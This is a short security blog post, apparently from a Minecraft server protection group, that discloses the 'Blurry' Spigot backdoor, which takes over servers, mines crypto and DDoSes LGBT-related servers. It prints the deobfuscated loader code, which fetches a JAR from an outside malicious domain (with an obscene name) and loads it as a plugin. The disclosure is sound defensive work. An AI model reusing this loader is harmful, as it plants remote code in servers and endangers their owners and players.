Skip to content

Blurry Spigot Backdoor

Posted on:July 20, 2023 at 01:50 PM

MMPA members noticed some malicious activity going on their own personal servers, when given samples to investigate, MMPA uncovered the malware family “Blurry”.

What we know so far

Blurry is a multi-stage backdoor that is capable of completely taking over minecraft servers, crypto mining, and DDoSing.

Blurry works in 2 stagers, one being pulling for a domain, a JAR mainly named BukkitScheduler.jar and loading it into spigot, the loader is heavily obfuscated, but when cleaned up, it looks something like this:

PluginManager pluginManager = Bukkit.getPluginManager();
if(pluginManager.getPlugin("BukkitScheduler") != null) return; 
URL url = new URL("https://i-really-love-cute-little-boys.fluyd.dev/aids/1ii1i1i11i1i1i1ii1i1iii1i11i1i1i1i1i1i1i1i1i1i1i1i1i1");
File file = new File("./plugins/BukkitScheduler.jar");
Files.copy(url.openStream(), file.toPath(), StandardCopyOption.REPLACE_EXISTING);
Plugin plugin = pluginManager.loadPlugin(file);
plugin.onLoad();
pluginManager.enablePlugin(plugin);

The malware has been seen to DDoS LGBT related minecraft servers. From what we can see, this is currently a minor threat, as it hasn’t spread yet. But it should still be a good idea to check your servers.

IoCs

Hashes

All hashes are provided as SHA-256.

Loaders

Payload